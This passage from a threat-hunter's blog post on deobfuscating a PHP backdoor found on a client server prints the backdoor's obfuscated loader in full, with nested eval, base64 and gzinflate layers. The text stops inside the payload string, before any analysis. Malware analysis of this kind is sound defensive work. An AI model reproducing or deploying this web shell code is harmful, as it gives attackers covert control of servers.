PHP Backdoor Deobfuscation
Contents
Part of my role involves threat hunting on client servers. During one of these hunts I found a PHP backdoor called shell20210526.php. It was obfuscated - challenge accepted!
There are a few PHP deobfuscation tools available. Individually they didn’t get the result, but in combination (along with some manual intervention) I was able to get a good result.
Contents
- Tools
- The .php
- Stage 1: UnPHP
- Stage 2: Manual Editing
- Stage 3: Run the Function
- Stage 4: PHP Deobfuscator
- Base64 Variables
- HTML Front-end
- Investigation
- Comments
Tools
UnPHP - The Online PHP Decoder
Sandbox - OnlinePHPFunctions.com
HTML to JPG - online-convert.com
The .php
Without further ado, this was the content of the .php:
<?php
eval(rawurldecode('function%20_fqGh%28%24_L6rsScKju%29%7B%24_L6rsScKju%3Dsubstr%28%24_L6rsScKju%2C%28int%29%28hex2bin%28%2731303039%27%29%29%29%3B%24_L6rsScKju%3Dsubstr%28%24_L6rsScKju%2C%28int%29%28hex2bin%28%2730%27%29%29%2C%28int%29%28hex2bin%28%272d343336%27%29%29%29%3Breturn%20%24_L6rsScKju%3B%7D%24_L9RBbeL%3D%27_fqGh%27%3B%24_K4lXsj5bZ%3D%27base64_decode%27%3Bfunction%20_RYp9tOnbVX1pHywKYLgJN%28%24_Y8EdzJhF%29%7Bglobal%20%24_L9RBbeL%3Bglobal%20%24_K4lXsj5bZ%3Breturn%20strrev%28gzinflate%28%24_K4lXsj5bZ%28_fqGh%28%24_Y8EdzJhF%29%29%29%29%3B%7Deval%28eval%28eval%28eval%28eval%28eval%28eval%28eval%28eval%28eval%28eval%28eval%28eval%28eval%28eval%28eval%28eval%28_RYp9tOnbVX1pHywKYLgJN%28%278od8tCYx5jtbQzoW0Ajc68dzleenCKrVtsYKZNSJ0JEpqAaTAGHlFzRqgw6DToz9gO76f27z6szNM8w8zJUHjbJbwCwEYFKc61MBj25Dzvyn7hd1whm5Y4QkU3sZLhVoQetUmbnvS31SMStQuBOun6zIpJKijyYAIyre8ugn2IQkOzV9lwtBaQVst7i7qBkDgGrB3nwIDQJJ1uzBvI7T1hm8ks0kNJ0WYJk0dp0YJHeImMkTrO3hGogbOW5h1ddDydID2stKbVgxiHsq06y3oCWRrB8f0Eki2Ec0uPNxzeGqTC94hfEKFyghMJMlZbnDDiNImX0ofgreBywOYx3Gy7XinJdaZICYMV9rzIgMNgjaz24uqKMYJvWrEAR3ueSnPs8hYUVHgYiAur9vC2UWNlIU57g91nzhb8Xhsy0g9CkklonSqUd44rtM6MZ82t0hkH22mzBo9FtDsMm7pCjA2nM4M8uCxWmjw1gvnnIsiQZPMkZ2NRvD1u0m55l9H5WljRAuKzsT3Lvhbgoy2qf2vhjzUzUdmQLF20uho4Jg3bShU3efAzFXbcmJMQhaHJbCxUz434jFfKTz5R3IW17iBW8isOZ38WCOcNQTp6H3K3VAhLquluCbvuPqwGMEv6hky8veeDOtUTdsxwcXdmKWJNNxeceItbSG1zLVG6oaJtGOVHClQCGjcQDpKhlTwci9nvrjNkYxdREmoV0vquUuwNew4GVDZBLsVuaGieApbAJhdX4WkpshkPPKkShmZgQgAAqMwLm7q8u2m1Astwcc3gyt4I0M3gGv9EptChDQSh5CvTVGc5dEuvR6ovVeddWL6b0EkMBdX3vmI1x6GEG2i6PWskW3AHxsiDjvWL9YmRmktFQ9SmS7wI1QLg4E8Bk0wITk3AmFk6iRkNXrMtFglNgeBaS6eHfhpO6IhTpVa4Z9UIb9zNAjXprFKiL5AauGvEmofDbRaFuDPKRQgNlUQcTVWtdiCrOdBsh6zkdOuMo1eCWy7zb1pY9u20ij8%2Ff0VjJpTSo0X7hKF2E3i2E3SNEltZ2njXJcLaKvWdrTYcXPy3y9mBgBBirKd9jzPfdtzSovEMgAGg5nBLGwx%2BMytfsRdP7VYL%2BNxZk0WkzPrq%2FiX8fkwKazxbLngM%2BuL1Zneb%2BeD5dV0wc9OPw%2Fmk6k1ngwW2XhZwFcqvbOzY3XsajHb2vhkz1XZUz5Mk%2Fkgtz8evXz85PXLn%2B63RZnZYm59%2F73VaVWrttrzxVzAeKpq32tbxcDqp47P9yzWdfLwKUHMOo61Yc9nk9mMn55NhnZ7weeng%2FHgkdX3PNdPROks9p8a47N3F%2BNJsf3QtrasTqcQcIxmfMqHg%2BIR%2FvlmMX15cSA%2B2ruOUxSh993ObDKcZBZUE7X0zIih829skC8G51drmsOqMEuLwezqdD54hIP%2BG5044p%2BDg3VQ627yhM90N%2FBBvIcqe0ZzeqX7mZ9kYuqzLPD11DesbhvWEKd%2Fx1r5et%2FqBzxznlrMiYpeqtaE2du2tbNl5VfZfYADf96zPrnWptWBl%2B0xHwpM%2BYh%2FIyI4MU8Li%2BWRW%2ByXS9svgjgTr504L2TrjI%2BSMczSfQHQp49z%2BrPvBr30scWiOIgeU8G%2Bn7tBavVzLw%2B4aMIPEy6%2FeCFPD6x%2BWMTZgcWoD2pcNifntk%2FNMSoo52gmht0W%2Fxnz6USAcA6TkHe7iShHXVE56oP6I%2FAZwajmiMDDX7CGnc45tQurKNrVw2yLvXjPwl3ZlruGxsKoV9mCQqsSviSbm0jSku9WtqLCFqPiUR1ZaMuxIve9RI2g70ZJIjAoStJeLkfd2nHGe6%2BcD3s%2FO1evrx7v5dPzD7%2B%2FuDjbezX%2F8%2Fh17Px69tbLLj97v8l3z5efD45%2Febd%2FdHy493x4%2BCH%2F891PfPhkL18eeL8OHg%2Bozq%2FjdPriWXb29n1y8WSv6D3Z03Ww%2FPBX7G8QXBy%2FeXXx4sHzvZdHL94d7h%2B6b8%2BC979fxe%2F3Xkx%2Bfdp9Tu2Ngj%2Bfz3999%2B7N4f674yeDdPjETxU8r0Pn%2BOnve28GV4PjFyvfj3%2B%2BGP6UXTze%2B30Yvk9G7376%2Ffxs7%2Flo%2BNPzwXyUXf7%2B03MnHqUE%2B9Hv00PZ75Ojn6f4%2Ff0brH929Hzy2%2FsEv11cv50j3Ps%2FO08%2B%2FP7nq%2Fe%2FqTqfz45%2Bnw9%2FSvwpwp5mh%2BPs8smz58t3P%2BV%2FDX9KYV7OX108L%2Bfl6Oe%2Frq7fTsSYnVcfkvlqPfFUcwvw%2FfS89%2FnZ8%2BnF0fvXB86HIzFjT8K3R3Pn4Jf0d%2Ffw6GD%2FhWgrKV48%2B%2F3iwEv%2BjL1s%2FsvBzxdi7ANo%2B%2BLol%2Fnzg8P9g7eHx%2B%2FeHR7F7vHx5713Bwvn1zev3A%2B%2FxM5bKO%2BI%2BZu98tK%2FDj%2F8%2FpeG6cPv%2BO7J0e%2FOwfvfr1%2BJuQvf%2F%2Fb0hcCD4U%2B%2Fn109K84ujn4eP%2FZ%2Fc%2FK9n4fu%2B9%2BWw%2FFvl4d%2Bev3kWT7Mf3r5SvR7JNa4wP6GL8SaHr4eOh9%2BeiL%2Bhn7fEcyAG%2FLvt4B%2FroAhfnL9err%2F9GdnCPh2zUVfv5xdPX3%2BPr94%2B%2BTJ%2Fs9nYn0Qpy7evzw7Ezgr5mEQD57HV%2FvHB%2BfO2wuxRvMXHwRuDQRuei%2BvX33IL%2Fevn7fE1p2eLmaT6Wk%2BHqRAG%2FweF7Qh87quPJQF6b8c5ED5J%2BeZOLaTJM8EeXCKMNf7aHeWPtwdzeCAWJyMT2Ynu%2Fburr3Dl8Pk0loMBJLNd%2Fj0emEtltPx4KG1a3d93%2FVVCRsgED8EERF%2Ff%2BYLu1K6Lz6%2FEXVa4nj5ZB8%2Bffr4dP%2F49S%2F7h%2FZHgfOH%2B0en98WXlm5txi9nfH5De1jgSEK6DbCPk%2Bl8%2B%2BGnoTjTPlrWIuPj8STbvMiSJ%2FhJjap1UmFPWAd73ALwt%2BaD88UG%2FSYA6I09zVJ7YzhcjvE%2F7bPWyQ7OyNF4YtnTYizhhNlT3fzPzuTacZ%2FPtwUSbItFtaAZS6DENw7fnk6%2FebCLMRc8QrYznyfDzBKo9nDXPd9%2BOB9OBBwXs8nVgr8Sbx62JP4RAWdOL8n21SnXnnFxED2jc6Dv9LoeHGBI8MsSi8nkQJYg9GaE7BKHuxeDt0fv9g%2Ffvjr4efjKT%2BevRkhD375zj4E2T%2BRZAPtsGrw9WnmXHSWLx3vJX3KPjc%2BO0uGhn4WvxtjOQOz3l6%2Bc4%2BPfB28Gj0uaP0GaP2oso%2Fu%2BoczrIcGM9BLp3ECcU%2B%2BeXzwevL6OR9n1u4vnE4PmXh%2BKc%2BDJsxdnV4r2Cdrz6v3vy9BL%2F7xDfUnTRP2j4yfvLt6%2BFbQT4XkC8F4cv4iHh7%2Fi387RU0FTJ79K2oltX7%2B4evVTLubm98XBKA1feKk4g7IrQV%2FH7l%2Fy7wGNM%2Fjpw%2Fmve8%2Bj56K%2FFx8OB2fGGfAcaLyASYw%2FP%2FjrPdLBw72fl0PvA45v4f12%2BerDGzVWXB%2Bg4wd7L84mf2aXL8bZwQtBp0va%2FeFqPnz37MW7Xy%2FOBunl4YffCgHTcvie2hj%2B9KKJLt9AU4mEnAoSAmSVsJUR7VQcCY%2F9rmCM6KFeRlEcCvSmh0Te1nC6laXb09Fiu9W%2BGA%2BG46VoMu15gp%2FxumkpjLjtKefDuUDw2IlEf2nmeHqT1IHaqDRbZIL4x64r%2BFeqrPr%2B3nK%2F3%2FUs2M%2Fblzzf3nUtIsT%2B1P54fPT6DVFf%2BdKrvix7sIDGtNqf92kL7giSNBETQxAyGow6Tfhsuv0Q2pMjt6Z8dmb9x%2Fq8TKy50YjoYXzyFRr6susOR5KEiNqaWNDsMBqY4l6RJAs%2BVYDranCJV83TDNhveuh1igJXcN5uN%2BrxNTBO%2FwGMjutmYsWpF2PFp%2FUVJwBY4Th%2BfvvyrK7E9MaVyAWDLvCJHiXKlLzBRgUowBc3ct0nYvFwAHUUJDAZlSmnfrpu6uM8DMQs06MUlztXQlycT4ZZ8Uj86CzEr3yS8fw0iPg8SR9ZG1AAZFZRQPRwRc2BdChPllNx%2BJ2CcGLXZYlH1mwi1u%2BqZW0UIOVNJwUIjlcoBi7u41sxzlKwSHMPsJUeWhiqjEXI%2F%2FOBFHyQRWJ0HKnSbXmkYaOJ2XZQOGL8QV4EavO1wiL%2FDugJitKwRjzjov8odJLCVCk8sUAun99vUA48%2BRm%2FdQLPca1tKLNhF96W%2By%2B7XSzGg9nUFLuw0M6uKFWR%2FZ%2F8Qm1E3bAX3KEZVa6hpZ8UND036PrdO8Gki%2Br2EDGgWmv5r5auswMtwYKIQuLVqVwH8Ua84H8Njq744F1dVsz9zBMUInB5t5QVe0GQiLWghxTkTbVUP427oEegh5KRzxfJ9L4pxOKL9vViOuJSFnZjB%2BgRPdQmgw1qW%2BfZ4PzKNrYlNdcvutwVa04PhUWiWSj%2FfmU0qJFgSehETzRcAkEzjZ9CZD7PHkm8zZrQNgl7uWCO4shLzY1oT4rx84wf2aDJsBNNXEpcI5Q%2BXQyXScHz%2ByvlOp16CTFuerWyNVEtVytuAEng68Zpjgn8IHcFVWV%2BGBUlCRdULYZJ9EN1%2FgoSjmKNZrYlOwpcceuk0yZee6s43xJkZLTMJjmzp%2BfTrc9cUMNtPtoS1cQ5Osu2t%2FvTxeLc3iFozRqC%2B73IBsMMmF%2BjhmbWx5PFYplWWXTjn1vhCXNxnnxvPyA2%2FHyenJvfH9g7%2F%2F5xezTJtgTuT8Y5n22JCncEt17tJphh7r5p9pazrbPxAOcCgBYgze8CU63aHUHatkWXRSkgCWST8tGY5%2Fng%2FPbpt9nnqeN4%2FfNFPrgSxYfXi7llSxCaJS2jf7vQxS7GyTA9tXcW%2FGyWLEQ1UFPv5JPzBR8pmehmqagPvYrjoBDkYpbwIxCMEEbEZcVRZL2wK8gX74Wa%2B2vt2kKgOhYc4FCLxvQDxlchbl%2B1XAdDMeXasgV6awh6X4AI%2FJ2ayZdOzi8yfp5tfU7%2BTPBzuxjYhtwoZuYAxUFTelRj5VECOlfXS7NyuydZLwfO2gkTTWY7ncPnT397%2Ber1Kaj%2FxYnzA5xERKLTyfBMcBKdGlNrfGyLJeOj0%2BtkNkvEj%2BW%2FB%2BOl%2FAXnjqTVSRbAxNOjpl6mIqV%2BueNuWhvUw2wxF7uFyJdfZGkOTcAI9HjyopvCH36v5z0mekxKl0QyoSPBAt1vz2fJeTZMBhmfzoejxTlwfrt2p3XSOtlonYjj77J1Ig7NE6MKcFOg315CWVEMV6Z1AvN9DPrlg9ZJ%2B8wuN%2BF39k7BZ%2BdWolbAuIQRg6rwnRsKLM2J8TPkxOTdyyPrP%2F%2BpVjEIuT5X4ASjdsRK%2FMQvB%2FPZMuOHdPR9keOAGaXJVMcDVRHHHVwyqLdUdp7IFWuLbZRw2E7INtC7xXg5ESckHEDyDa6zYif6hFWMFkodyBpV6gCWZ3PUTeAgJ4RVqrV12g9RbT7jl%2BKTJWjebIE7Xangol5WCBzJwtjJNY50i8AV%2FHsaRKFqXtBhQWfmp%2BlEYE7q8VTwOVEeVjgDY%2B5NPlavbQcxAWEAhqvC69K8jOW8UM8sToPsiaI64xNmk5DknNgngrjNBHkT7Han0x4nfEgYkU5WELc954LSDedZniek23v5y%2FGzmRBfB1sdW5CXxfK1AMhu58%2Bvn8BZwYf7oinjtLF3rpPhdD7It5Be36kWiu4CReCiCOeJJUGQqtmkLxstGgD%2BkjdDcllo5IxmWq4AX84WgtYAaUPG95Mt5u7Z6Zvj42el9rItDtg2H1xMJplgcaSOKoi5YGAYLSu1RvemBBOj74YQgn008XN%2BKiQKlgVhryixxes5e0BEAD%2BnE6IiF%2FeJYOCKXTaTE3WQUj2DCFzet3Z3oAnYXQbOlHusTwcSI%2FRtVt0FuWDDGW0VdXIRh7aLd5PbFW5D%2FNzN4T%2BGktQm3qNyHItCsiD8MVusaeRfjuPWTvkfdLPqimvtma876YsCr765pxahR36VmXfUN6wAFr0dGEGZ3nwzMLK929oWn45FfdfewerWajei8VB9tR17RyBFloixDHlm2S7%2BFlt8ir9xgR%2Bu0zKr%2BTfZCgDNYCjopZiW8l2pghYk9Y48Fl6rNjJYSusjyXAeJgJZC9dTeuZ%2BnkRir%2FVprzEn4MXTkgErCdBOPrDsz9OwP50sNscDwQ2OcPlt2%2Bpbgh0bT8Z9Sb5s60erqmGQRyRhAi2XOxQMeqlZUjtGbLsEpkjyCBVq%2F2gVt0TXN%2FWGzZ0NUtlRDf4SdQBHJO4oAHAKPzx%2B8RgOs%2FnSysd8bu0aQ5YsIHT%2F6Q7E8uP%2B859fv96DUaByy5VbAmpSz58nKbZYvSzZvo1OEI9aLjGtLaOVNpRS6w%2FO1Wn95pN0RadkahAIpxgRSn2OO3%2FrjFnTEbI%2BtfPEELCJ7WB0rChTDDoIbTgC7PPFmfgp%2BRYb7WOqU0LFam%2BfQckZn06Xk4Vuis%2BTzMKXcCtVtjjjV5PhajnxslouA3kzpTJ7%2B7AXrVfPn8CXz%2Fxcf%2Fmw%2F8z4Il6LavRFvIIvoqqso7%2FIOvKLqOOJr5VKooQEQX%2BRIMgvg0E2T8pqz5%2FvHT02PosPHhapdIil4LPnZ7OMPnn%2B3uEevFtMr9U7%2BeeG7Sbnal1AdqSfG6A7MN7irw1bCwOngnYWcmq1gCDeHahSPBdvygI8t4azt5UmzNrmR626rdTGV0%2FKBlbKiEZkGdosIHWZ%2B6nvuk4mNgbJvo2qr2bxwZT5HkktHQqTLI2L0Nj1%2FcQpgPHyeJ4q25wsi8RB1fdyD4RQKkBbYlba5VAFwUsmsbo%2FEPvOtR5Yg%2FsfUfv3Cf9oE6q0Z%2BcZCIwzuDdKXQdU%2FkXhKJ7aESMfgF6QJz20iOKKNPVTJ8kyYBChI0YFpKABWjtosOs5MYwBAaZvXb%2BnDHP6UZQ5ePuUKcmCedbOA%2ByQemIEkppgmoDSLmgKPPFL4IkfikrKBCjq%2BaIUowf1RL32aWSMwDK0m3pvVKz9OsaeWWej56WFEMHpYVJsml%2BxUdu0jasmhkQOap1JGrGmpyxxugJ0wrsSS%2FysG6MU0I2VRVXcjcVK9FM%2FSIUIFomnunUe3H%2FwAGQzKMvcIM2z2ioHfpSLmUvdOFEIkPpuofgNaot1k26yrzqL%2FVBMLNVg1KdGOsKzfDZRk7Bl2f%2ByFbaFvcQTcNBDrTC1V1vhYX2F%2FTD2BCA0eGV7JsRvTc%2F1biBYGVWQeIsj6tP4GQ25jrcphxt7ehh4UqVYtfWrkbM16%2BgFPbiGpYex2704FJMRCdgUDxf2Ar2mAlZY5jzg0UHD%2FApC9sFzjAsNOcW%2B3%2FNENapt4kA364Yw%2BNT11eKmRTd4KtYYIWBUU60KfbttVXpe4OZgggptU6NF2hWt9QluGJG%2B6tWEJXBBv0GP2jLkcQE6DGqXGqRJ6VNLjGbtRgSgITJqylhKfd6t7kJ5Dq7b8kinGen4G%2B09SO%2FPaMeuEgUgunTqV4mCPNVr8Kizfg00Aq%2Fh7oge%2BtavPKuOVm7%2BoiKC%2B%2BVC4H2pzomdBFSYcbfraerS96K4eAInUNe8I4ULarEEINX7Adw40kNJJLkQrfpBNw9yWLgiLHUT48HwfnskYAILTvgBd8y9UCwjFdcaTGDfkbWkKg1Sqd3fTaV18CcxQ2AKvZYhBiPhVCmz2IMH8znPsqW8uyM4NmqNiBfuRzKruv9I%2FHDUjzbPZpMDvljOnuBa0xoUYpiAwviQtrLAwC4WCW42mgZGg1VrRD0L9CPVTkU1SK8qekDgLRYZWJTLcaIxtNYgiVoeXXSDfGFedWu1Zj90A4GP4g%2FH4WDdHLppVJqHxN0ADng3dn1FKoC%2BiLETpIKiTEegqxI0Fy4js8TtJU2jjT0OijkqptY0yNPUMOh14HLVOLC7UVdMUOjljiLFgmFQ5744sEKwEqSGJT3E9vpUg1EBRd82N4GAFwFIUtgwVaEWBUvCQ2QBuNJMMjS9VgNVhI2ok9jlgOL0kKI16e0WeIIV4FNAnVEvTtgVQPZpGhlNqmYPodZt6KzA%2BDY8Rng29GKtw99HzQhMa8loOGqRBCqBTpjPauyq343ADCNJC%2Bdx0%2Fqn3OmJ1SIkkwsYZYKA9wnhGBUwqYK10eq34HAdTj%2FzkjoEcQh269ThKnW4car%2B8Ywac%2Fk3Z5VmiNEo%2Fva2t%2FOr%2BTyZbgs5ette3fVu864H3rpIxQlPNFwphbRq6asa6xdLWmX26c0RmWBaX%2FWaGiXo1WMqoo2e8HhgcZhztUWMNVLmsTeRZ90BWcpKCGR90eLsBnWHWV1MwjFVXnvRsRgu5%2FzQvN3gSQSspMe93mPjkPO6EchY9JBYzg0pK%2B2mQBjiwElLBgT0z8rq7WyKV3VQpx9nPWAn6SHXQnw5gxtZVCClOWlkYaWldbHg6nDh6QMeT%2FKLmM4lvQVzKfkSTWjx5XSgXs0n52jOgwJrmPrgZ0FwS4ABOjJ3QnD7NBpGRRXGEkwbEoIN6nNjOlg5DCuMiz389%2FxsKo2vqmtYOZSC3PfRDgkeDfPsdWOgGUK6LA0UaxB1Isf3rb6cjR%2Fp2UYiYNN86EURQF2PynVJnAw8N6iP1TmRpfvUOaPS%2F3xarke3T0vqFSD9RoXXVRjTcb36IKk%2FNbjpgkgDuvykQQCCHDbTMK1%2BGLqC5vUEK5esmdYpGKnB36phmrNuCBweowaUTVGhpgyL9qlZRkUV4V7xtCvuq%2BMfR8kI5n84vwKAdbMr8BtpFEuFmKqQDcQQTff7RAUY0U45uDoJqx9W8hAQrftFAbscH0bripCKVcWOGZEc4y6tCqpxmcbTAMTqgIdK%2FSpoq7yZUmr38mqltbvbWmu7v3IpVVa0yVtPNmu0J%2FjNLTp%2B7DteF9kaAFFX2n185os6INQjdkK0%2B3qW4DIOnkoCLoGkggZIQsyaqT4QN76hEyj%2Fstr%2BbuvzNHT7i4IPN%2BXlUEteLcj7ofq01SEa8jQZmgOwdlueghAgIgAngzyZVSDEinduvzOcnA3G1u4mjbptSebM2pWXGfpWQn5YfzFxw5i%2FDSaDMynBaLnfNviVVcJiuL1vQQV3yxH%2Fdj3dIe3Eb0AIICoVpoNKtCS2i40IGH4j86HxncpS52TqZXZfbTi5U5PJ3Rq7%2B568BboVuqDvp%2FS1%2FfDfR8S2vNnF8716O28Wu%2F5lF4%2B6NSXeHB%2FsClJd%2B4p0sGottgZDjmvbGDkp07RtV27fNYwgnCEFIZnBC5L6gxHVbbQYCH0hxAgaj%2BqSRuUP97o5tIEPgx2uurURRWfUnFbblFCtaG1inoFmlry8ZccvX759ZW3YcESjS7jpDu6nRQbHND5KHRTadIBQMV5ODqzF5JUVOIHlbLnbeH9Hgz2Xx9Lxq%2F2fHp8e7h%2B9rd3uwW3SNqIf2FqdPQaOFF7%2Bx6ZzcTSAJRPiynm2SEanZ3w2ldJMaybWZZQctsQpCtaZyW%2Fwl9iCA7gAP00G8HMxefLq6Bf4azpbDo%2FgDz48m0x%2BapWXMUa%2FtwBbuc%2BMsgAUkUXSi0uFE1w9noqmSkthQW0naRtNir%2Fheti0jLlbDTrr1V0ruomzuOvHhjnf58EY1KHziWn7bI8HV%2BXbTkv8bAHX0%2Bn41oZjbRy9Pn3z7I2y9CuvL6W%2BKsojUGqgeb%2Bh1ABqfnq%2BWAKrwosEhNes1yu1hGL5yCRBsR43OgvuQnO0mZUsU%2FUOlG%2FfNGxesaPGPNsZnw2GCXmvtPkgxz2Ch%2FiKIboTBiDcxJHWnqM%2BfnQqxjGv%2BOnrt8Cx4VSzXpdrIa%2FjgDXxYHjKR4PFqVgesZe4j9ZZRRQbnlN%2BUAAv6Xt5qq%2B9aq6rQQHTTA9ShPRcJxQ0ouum6RO4oAr1PZsWmT%2Bh6Y%2F9MR%2Bc3addVHm5vF8ReafLyeyn7RkfX72uis3GNXs9zIFZHwz%2F5gP4Zla3N8FMonZbz%2F8aoKlKzbehbsEBRVB7UZHMRRWzg1oVsLUB75pbxHuwc5LHNM1w6rkezHAUecad2FdTIhE0s7UY5LyFm9mwFiUJRClZruyaiYR2zwFxasVyQeriYaw6oIQNvy6UbOfVb3njzANL20IQ8KLcUPZ5tpwc40U0TMIh%2FCUQ9HyvvHcemRv%2FhgpwIT%2FI9%2BE5HS3zzxyv9fNkMhxfTdBsYHEu9pP4P36AFax1Ul8WtZIoiQQ9T5wnUeaqA0sea0rTU1%2FSwWKEhk0b9rw%2F6D%2Bz8s3R5m%2FifFgkeW1VBwvruhjkk19uwpDBIrl7cyjQPb65uezuzfGzcXK%2BV0U92ruMZ16wtzofsozjgjRZpDwq7cKrW1Ns3AmFNanGhAHMw83eF%2FQ3FZyCz4O0FAFv9GIGM2qTq3HTHNQXRHSk%2BtwNBPvRd7Mu4CSRskZuhsgbo5HIe8I8dw5AaM97cDeH4CmiWOQhODQGTuQ%2BbW4wzhy48qeCVELf1GEtRiXkSGmjCUZljMPS7FPXB%2BUmPQxB2jUNzup7tE9zyAiV9QELdup2A3VYZynepz3AaAL0XZnTA2dWgTmJ1Dtf3gdTM1BDf0IcvCTK%2FRFVzj9WSQSe3Zf3Kyc18vgd%2B0Q2ZnyDT%2FbJhvxUxWzDvh7KmM7x2qr%2BO2VTb5vmtPNEUAHDfJYoFSPsaWSGie6ytIh5GbplFR403rGqTpg3ejJGvRjOW6KYql3kXMVEZ0XSheslfKjZ7%2BZBAJc6%2BKgrpSCeTzfywEMjSLWLSuTmGqWTyIcrXS8yryHdJO4atibQXDHhhboFSXIw%2FKCaskf0Z0S9GcSpEaeHVJBjs4xqSEMK7LyfxF6UwVUZQEdfqNc%2BQcqogL61ludVP4wxKIGQVjzDKq81Er0u5psLvsgm28AcJWLBp1Ox0UFi2iSisdcqmXx9qgBfRo67zUXrqyqKnyovC0EiUaVKbWA0nZXvzXF1%2BlmU%2BhlcXpdBcoSE0LrpKO7ToFmSFaX%2FchQLIQbEiKGQKM7%2FAhv%2FluGMEPKQw40l9tZIhxUHAlOwo0x%2FBc6N%2BUjsh8VCTCFADpR5Pni6Mj19goZRR430qBKESpo8rp612nNEndv5OnaCNh0jDkijQLVRYA7P1OlyJuT26ulyVmEs1tTEfWtwpGzdAVYpSFIZPCXppTOQ0YFTstAZ2NAlQdc17STse0JoBBKEh28OdnqSTJUuOva9nEtOqPpNfBkOkoOSsnWgFSGcykcFemhhoRk4LKEv2%2F0qu0CEd8eiZmh1%2FdrxIMeaOymSLyfXgbFsJTHdrKJt3cRJPRIYbjArLc2sqAZxNGu0X61GI3esYVi0f%2FOJUjV1311MB7NMsE1CnNw59afyt2ZEMkH2DoDdyJQJGyOBiEgfTRijUurAEaucZAuxk2fgwANCFSALozmmesgSL2wLrXKFTJdDYAF6rHaShw5crNDjbyzOzcbXxmrAOnzTYkDZ%2F95alHxqBHER6GHYItl6sTqtlnTDkx36azpsmf3ptZWCeRm5TzDA95CEzqyFfTJO9oy9WPF43FglwbMyPt%2F6%2FRVHOYf9hQ%2BJAlRb4UAv9CK4fyqyXJ%2B4jsMh4F3m%2BMAI9FJ1M9UPeC%2FaE6d0nGTAHKZdt9S%2BpLFXGAymmIr7VYs3PwdsCpJerqQiuPIZw1WSYE3B7iwsDOtG6qu0rsnQruaT9%2FFc1JDap2op27KNIr5LI7yhiHN7kfj2RqgELgOCiUacgsIsBldz8VlMFYQNxEdZf6tSvMkm8ZOLzdMkM1qmhj3K4xT1U3FaWhSsXk%2BhKopwFqButu9ABxUf%2F5ExIs9SS99v6CYIMF2h58G%2FDRVILDTqOZV6LTaEo2ssFlPI2fxqE%2BJRqssV0lg3wQIabA%2F%2FKd%2BHFWclt%2BLKRLptW0d0ydCiNPPKQC2ZYceEWCvktR44bBLGSlslrwBz8iJNIdALbQD60u2FEZhtIvIy2jTq1A6FzIu8TqYQm6GTooGlkQ9ybxbxxAh7qTUFZIoO6NGrowfOpsA6udGopDxVeQH2C9R2RWdW4hX1yKhodTsWoQ%2FmbfRQG9rzgbsayx4SDy1zez0tWTCaITVbHnpbe9pwlz14AE0TMWG04fWlcUVbVHNIBmYJAqx4cQYX37QAJbxgeEaryWhtpeCNxKhP8DECZyJt3tCmF8kdo4VWSlBQ9cD%2FYaoc%2BU%2Bp9oFJI%2BLFCBZJTkmBdK7oKfcC8Euix%2Bp%2BdWKMX5InYRkDwyzAbEBYjJqDR8J8YArzjZyyjAqrbKbTtAtxlcIo19Z0YrFDkD6TsKtkPnEyJIIr6PcKLwZ7QSFXleIRfVsnzvHcc8Qk0IMayzIPLPl6rkuyYZZrQW9F0lvjhtUnEBgBRJWpWeqCGmU0khWx9REER4HBMYJhRQyMswjUnzT938TLlK56iojQ3DJqUiHP7EatqFiBLjJsAv1LO9KAp2Dj0I0TR5tHu9CMcZrTvQRKDAY%2FIGSaIEB9QhA8bdxIBi%2BsOPF%2B0Q1iUanb8129Phhj6SYZEoFjBKrW4KQ5Bm3JirAkMGs4WmRycn6ZHGk%2BK3fAhJIakWDcJnmAaRH2Br4%2FyeNyyCaThPggA06J878LCEOdNSEMNcSo3ArC0CQxmjJDTF0nyOCGZrTMakaqbpnE21adL5vZW%2B08%2B8A%2BcRXv%2Bl9icgkDGZEJScJA6a%2FoV7fbBcVfkcTe3rdtFOKJg02IIVCl6SogtaCtk%2FIUU6htCAKgnc%2B%2BSRLAGv97Ylkexxw9JOCxTu7ijgv0gWZy9QigqWVUSpOCLAZFqdfjoWEGFmu1aYMlOI894O17fjdWsGRJ1FOr2gtzoHiheKWoFJpYwWIAj5MkQHuSIlW1%2B9RdnxpkReCo4GjS6tvE%2FYrlN%2FXBfLwHVb33InBuEG2BpICgyrMCYexT84wKaNq3Ce2t6Wuj176aTK0f0CevsvE7C%2FDP3XmgB0fTyGgK1LkPtu4EIqPZLtktc9UJr%2FzpVjHS4ScqtGyuLwKnYMqyKrlJKKpUDBFVimx9mnVGa3A7cRGkBY42esg9i%2B3JTWuiF%2FgsJFGcwdkQaeM6Ge1iVY%2Bm7rnO5X1vhqHYQ%2FCvoociAS12kSXDtI88N3M5%2FPudRT83wURidgbBKxUDXwZUhBsXtX163SwHe3cEULUsL4LBhwX73%2BiUIe03bBmmXrJh8I3kCvxG10z0rc0FfFM%2BOy3DftAMMOr1dlUjTba%2B%2BitZOj8DVjl0Pa%2B8z6tGjFQDLDj3CnDrSv1yPcI8Aa4xyotCoXq36yo2th94hQs4iY9v5ZoELYG1dlJfUQpw43PBdwm7Eyvla7c16rXfjfBuh8BqOhmpNUZtq11Cza5jCqkbRk2vHKZFglYUrpvE5aEiBUMaB80Yo4J35KloQRgtzyqdpd4YLYncNXSBpQT2yq2VltjpnpLRzYoaSrsMu7Rib0QB7RiZPkjYHbx1HixQi7%2FM%2BGd%2B%2BjkZmVZHlKuCkYGJoW0yrTakba80NIHUB3cxrcHQTd9oUfNVGjXLrja%2BKVSBCeMOTCuawaqJFXWkEr%2FyuhoysGyiQvl6vQAYzV7iOvr%2BUPCsl4J%2FsPgiySbDFvihtygwSOX1Rgsks4ZSldei1BLoVlO56oeNlp3NhoNEkN0FL7bshhrmd7Pe9WyyECwKGck31qyWaKp7Pk%2FSG6tiAbMmmZwuzhtr6Y9mDdF7Y2F4X215uqbRaaVcIQT5xoL4wSh5NoA3lYIWlfyh9kms1%2Fl0S6r%2FthrqybVbX4hayMaDptprPm201pSX695UA5q6Eb6VGovkhhE1fKQ%2BbuihCaJiLThFvex4MBKSUXPp6reNFq7o9WjdWhtfZNlsnF7PmzZx01dZJ58uiknjzm%2F8LGvNwbnncl2l2teyJ3HEru%2FH%2BLjRogL4%2ByXiSoUMCGFm0yrwyndTMDkQ8pIqzAa5YG74bLbMrPHAaiAhVPbGBreNBhtaGA4T3UqNUHwbXNXKd2lyFbJqaRM0gxp9G1hlxduaWgWnLFkFZbrFswFYx387MGXV25trAqgsa4I0H25a3qYFUsVdoBgn1nzG8yHcCkv14PrmGqC4rX7rRBLl1sm3zpCi5rc3tQpXvW6dVN9SvVbcnAzHcTxHTcjdV3twNr%2B9mYb5hXr19RB1g78DwnIFhNVmmkBYVkGgj%2BLXARqbU6B8qrAExQ